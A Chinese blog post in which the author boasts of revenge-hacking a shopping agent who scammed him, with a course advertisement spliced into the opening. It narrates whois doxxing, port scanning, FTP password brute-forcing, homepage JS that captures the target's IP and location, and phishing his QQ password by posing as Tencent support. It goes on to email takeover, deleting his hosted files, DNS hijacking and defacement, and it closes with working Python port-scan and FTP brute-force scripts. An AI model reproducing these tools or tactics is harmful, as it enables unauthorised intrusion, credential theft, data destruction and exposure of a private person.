0×01 苦逼的開頭

當我朋友圈被代購侵犯時，覺得什么東西都好便宜的，有代購包的，潮牌的，化妝品的，一堆一堆的…當時我的心情是這樣的

以前一直也相安無事，直到前天，找了個代購，想買買supreme的tee，作為一個冉冉升起的新星黑客，我竟然被騙了，，很扎心，被騙900多顯然也夠不成立案標準，但也夠我買好幾箱辣條了……氣得我發下毒誓要順著網線去打他……

很多人學習蟒蛇，不知道從何學起，

很多人學習python，掌握了基本語法之后，不知道在哪里尋找案例上手，

很多已經做了案例的人，卻不知道如何去學習更多高深的知識，

那么針對這三類人，我給大家提供一個好的學習平臺，免費獲取視頻教程，電子書，以及課程的源代碼！

QQ群：101677771

歡迎加入，一起討論一起學習

我朋友圈的吐槽

事情不能就這么完了！我可是i春秋論壇的首席帥哥哥，反擊行動開始！

程序真心比我想象的還要精彩，此所謂多行不義必自斃，哈哈哈，

由于最近我在寫Python工具集，所以，文中所用的工具都自己開發吧……

0×02 前期的破壞

那個代購之前跟我吹牛逼說，他有專門的網站….嘿嘿，這就好辦了，我打算從這入手吧，于是，我搞了個WX小號，去加了那個代購的wx….先套出他的網站地址…..

然后就套到了他的網站地址…..尼瑪，貌似沒有一點難度….這怎么凸顯我的社工能力，算了，看看他的網站吧…

接著來一波資訊采集作業吧…

查了他的whois，并沒有弄隱私保護，然后爆出了他的名字and手機號and郵箱，跟我被套路的時候，轉賬的手機號和名字一樣唉….目測就是這貨了

接下來，埠掃描，21埠開著…(我會在文章結尾放上工具腳本的….)

C段什么的就不做了，沒什么大意義，目錄掃描也不用了目測…這辣雞意識..沒誰了

不放過21埠的開啟，來一波fuzz，萬一弱口令呢….

FTP爆破工具走一波

尷尬了，我靠，直接就是弱口令，我的媽耶…..

差不多，整個站的權限已經在手上了….

然后傳個黑頁嗎？？搞得感覺像個小學生，但是好氣哦，后面搞得他更多的資訊，就整個吧，啊哈哈…

0×03 進擊的巨人

他說他是日本代購，那咱們就定位一下他，到底在不在國外吧，呵呵噠

參考的方法是：
https://bbs.ichunqiu.com/thread-33742-1-1.html

既然咱們已經拿到了他站的權限，那么，咱們可以在主頁插入一段JS，獲取他的ip

Index.php：

然后走一波套路….

洗洗先睡覺了，第二天繼續….

睡一覺起來，上鉤了..這二歡訓跟我解釋….我有句mmp不知道當講不當講…

獲得了他的經緯度

查詢一下：
http://www.gpsspg.com/maps.htm

好好的一個日本代購？？跑到國內了？？我特么的，竟然被他套路了，我心態崩了

以為到這就結束了？？

沒有，遠遠不夠……

既然咱們有他的手機號，那咱們可以嘗試搜一波他的QQ

由于他的手機號系結的就是他本人wx，就不繼續測驗wx了..

然后加他一波…萬一成功了呢….

然后經過了n個小時的漫長等待，加上了….二話不說，直接進空間….

然后找到了他的自拍，我識訓我之前要順著網線去打他這句話….

然后繼續套路他一波？？假裝騰訊客服送他各種鉆，萬一他中招了….

我胡亂說的一些老套路，我自己都難說服自己的，，但是他竟然信了…..

這就獲取到了他的QQ密碼，所以一般人的安全意識還是很差的！！請不要騙黑客好嗎！！

于是我嘗試登了一下他的郵箱…

Qq郵箱涼涼了，有獨立密碼，我也猜不到..算了…

試試他之前的那個網易郵箱吧….

登上去，然而，什么都沒有，目測是都刪了…..

繼續嘗試下，用這個密碼，咱們試下他的郵箱用戶名是不是他的域名注冊的那個id

然后我竟然直接登上去了…這是rp好嗎？？

然后我又可以修改他的dns了…然后實作域名劫持什么的….反正我也有他FTP的權限，我先把它主機的東西全刪了去….mmp…

然后來個域名劫持….修改他的決議，決議到我創的虛擬主機上….

然后差不多就結束了

0×04 華麗的謝幕

掛上黑頁..強行裝一波….

拿到了這么多資訊，可以找他攤牌了，mmp

我打算放過他了，畢竟他有了這次經歷，估計也不敢再騙人了

畢竟我的心愿是世界和平…

0×05 總結

這次可以算是運氣好吧…..希望各位不要有當騙子的沖動，惡人是有惡報的…，你還要知道，人外有人，天外有天….附上文中所用的工具吧…

這里我放出的是單執行緒版的，期待我后面的系列文章吧，我會出多執行緒版的，啊哈哈哈

portscan.py

import socket

def Get_ip(domain):  

    try:  

        return socket.gethostbyname(domain)  

    except socket.error,e:  

        print ‘%s: %s’%(domain,e)  

        return 0 

 

def PortScan(ip):

    result_list=list()

    port_list=range(1,65535)

    for port in port_list:

        try:

            s=socket.socket() 

            s.settimeout(0.1)

            s.connect((ip,port))

            openstr= ” PORT:”+str(port) +” OPEN “

            print openstr

            result_list.append(port)

            s.close()

        except:

            pass

    print result_list

def main():

    domain = raw_input(“PLEASE INPUT YOUR TARGET:”)

    ip = Get_ip(domain)

    print ‘IP:’+ip

    PortScan(ip)

if __name__==’__main__’:  

    main()

BruteFTP.py

import ftplib
from ftplib import FTP

def Login(host,username,password):

    ftp=FTP()

    try:

        ftp.connect(host,21,1)

        ftp.login(username,password)

        print ‘Crack successly!’

        print ‘username：’ + username

        print ‘Password：’ + password

        return True

    except:

        pass

if __name__ == ‘__main__’:

        host=open(‘host.txt’)

        for line in host:

                host=line.strip(‘\n’)

                print ‘Target：’ + host

                user=open(‘user.txt’)

                for line in user:

                        user=line.strip(‘\n’)

                        pwd=open(‘pwd.txt’,'r’)

                        for line in pwd:

                                pwd=line.strip(‘\n’)

                                Login(host,user,pwd)

標籤：Python

上一篇：Python 開發者的 10 大編程開發環境(IDE)，第一款是我的最愛

下一篇：1.14 排序不支持原生比較的物件